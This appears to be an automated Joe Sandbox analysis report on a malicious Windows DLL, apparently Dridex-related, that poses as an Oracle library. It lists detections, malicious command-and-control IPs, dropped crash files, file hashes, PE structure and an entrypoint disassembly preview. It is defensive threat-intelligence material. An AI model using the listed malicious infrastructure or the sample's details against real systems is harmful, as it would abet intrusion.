2.0.rundll32.exe.6e830000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.6e830000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263902525.000000006E84F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544174
Start date:	22.12.2021
Start time:	20:02:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 96.8%) Quality average: 78.9% Quality standard deviation: 26.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.182.143.212 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_acf0c1b1d931196b9999224049caaf48ed8bd9_82810a17_18eecba7\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.922125224955901
Encrypted:	false
SSDEEP:	192:xmMiC0oXuA/HBUZMX4jed+fm/u7sCS274ItWc:AMiEXuA/BUZMX4jeKm/u7sCX4ItWc
MD5:	499007EBF56D77B0189DDA896BA1C4DE
SHA1:	91D7878017B238972F91D5C792BB959FEC82DE4E
SHA-256:	EBD2A36EBCA81495AFA4DD1E7028AC93E78A009519858BDAF3073E0837EADC3C
SHA-512:	2B7B64D821BE1A4653C867F05C390A9A8B897ABDD17A108FC8B1E8C8B53BC4DC328682F593F2C01DD0BF1D326098062F77BDA0EFD9E84A715AC7A37DD256B33D
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.5.8.4.3.0.4.1.3.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.5.8.5.4.6.9.7.5.8.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.e.b.f.d.c.4.-.8.8.6.c.-.4.4.7.c.-.b.4.6.5.-.1.c.d.6.1.8.e.5.4.7.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.8.d.9.9.2.a.-.d.b.3.0.-.4.8.9.c.-.b.1.b.c.-.9.f.3.1.5.b.a.f.7.7.9.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.0.-.0.0.0.1.-.0.0.1.7.-.8.8.4.0.-.5.7.1.b.b.2.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER97B6.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:04:04 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45498
Entropy (8bit):	2.1178952305241547
Encrypted:	false
SSDEEP:	192:SDrw0XFeUH/qO5SkbP/drlei+HEEqxKxjyCrmYny:6eUf15Lb3drXYxjyvYy
MD5:	797BC81A1158FB63989497B035879FC6
SHA1:	626D53CAE42D30730110E4E1CB86ED4127EA47CD
SHA-256:	73104FFC864263D171093BC3EEF03AFFE06660EAAADF320F76C447916C9B3533
SHA-512:	874F47E20AE83DAF648AA7F5CC04DFFBC9E11CD746D99A08CB32D9DBE0CC9ACE8775473517C9EF300C36F3365ABE074EEACFCF244FE54F2F8612BFB2DF7C5AF8
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......4..a.........................................-..........T.......8...........T...........@...z............................................................................................U...........B...... .......GenuineIntelW...........T...........,..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F87.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.6916703589045934
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiOp67OgmsTB6Y086KgmfT/ZSuCpro89bsWsfrEm:RrlsNiw6N6Y/6KgmfT/ZSjs1fN
MD5:	F5B52B104E61752E08FA79034F86427A
SHA1:	0A8365C70C11F7117C1C5A159BE4E210067BD68E
SHA-256:	45CC1E4E430B0564D53DB748A41848C884685CD94A4BD9F2B347DC3745A1190D
SHA-512:	FBD4FD83351BE5B43DA74F54CA5EB53AB13E79F6BC2EB6BDA30E3C726A7022CDACABC61964589FE1E7021C8A7FCEB5F2F0A634E603CC3E9656284178323F46C7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.6.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA219.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.487517127877766
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTJgtWI9m4WSC8BI8fm8M4JCdsDvhF3e+q8/QLBBc4SrSEd:uITftdxSN3Jl7eVsDWEd
MD5:	FF5A047CF993A42F5B5BABA30DE99647
SHA1:	ED221F555C69E434400FCFC08768397CE74AE74C
SHA-256:	60518FEBB19DBDACCB3E4D644C22BC1B737F2BDDEB9F459B6EBEC57C23B231DA
SHA-512:	F18D60FE1983B9C3F0C45C12089539753FD5D0A5B37667DA7A95D69851A8042728AD0B5587E77B9E48C1905CAB3DB1B11FE6FE50AB1369966FAA2285E852434B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309754" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.281346260961785
Encrypted:	false
SSDEEP:	12288:no7Mhuoq0S69Kuz5mQPg4hGZVkT4Tn6dwkmEOhdeYtsEhJXUJy:owhuoq0S69Kuz5kqBTh
MD5:	B759349E398B9119E7DA64ABBC34BE62
SHA1:	BB1060988E3111E18F01292140BA7BDE6B4E2601
SHA-256:	75D1B4D1ACB47072856B6D166B08F678ADC1C5FFC9405014EADE4B76CB38FB97
SHA-512:	A172121E871AD20B23A86B6ECB5E12A3640C2AC6B7D37ED85354357FE66A5C3651B2AF3BFA79E4BFEFA811F503985B63F0F9EF8480B1B6296F30AD7915F2CB60
Malicious:	false
Reputation:	low
Preview:	regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmj.-..................................................................................................................................................................................................................................................................................................................................................u)C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.116206154896422
Encrypted:	false
SSDEEP:	384:kXFpse53EIxxk7Ru39vYBnt9SaPlSpafYt7+ygEhBzpfjrjQOe6Xadp9xfd:k1pl3LxkNu35YBPSaPIpafYtCyg8fjXW
MD5:	8B67F4AE3DE37568249414D50233DAB8
SHA1:	CEB8AE6992BD6AE8AC6A2DCA0F68FCDA77F9E726
SHA-256:	0A39149007089E4916B6426C2F3C22F2E304977B7F5CBA417F5625BAE1CCC274
SHA-512:	753183DE302ACB5E5A5853BE41FADFFB92343E091ACF30FDC479CE2E36887782CDF618CA12B4B3A7C2EF7FAF273A19E776791182F6ED91B2CD94C1F3A8ED8E04
Malicious:	false
Reputation:	low
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmj.-..................................................................................................................................................................................................................................................................................................................................................u)CHvLE.^......V.............V.D`}x2..s.?..................0......................hbin................p.\..,..........nk,..c/..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..c/......... ...........8~.............. .......Z.......................Root........lf......Root....nk ..c/.................................... ...............*...............DeviceCensus.......................vk..................WritePermissions

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322458028777742
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
File size:	544768
MD5:	57cc0ec93c55348dd7b864e26ec96379
SHA1:	bcf46bb64fc5a673e7889d9ba9baad26bfab0ff7
SHA256:	60bd3eba4dac7d37cd07e375f4dbfe5e816b0ab599f28da31c5cf5b180b5849a
SHA512:	562b44d23cbfa0ccec2bee34dfd5cdbad64f87adc8b152c2874d9a4f5b249ff7dfa437aa150fe33e919b3aa3871bf8b92dcbc8cc11b47aed69e791e1d4a9a784
SSDEEP:	6144:D7+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMQ:D7t2UAogoOwhx7nA4+pMXg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F13A4705191h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F13A4708D1Ah
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391636439732	data	4.47964770197	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316228882879	data	7.44062687646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x66d8	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6296 Parent PID: 1988

General

Start time:	20:03:55
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
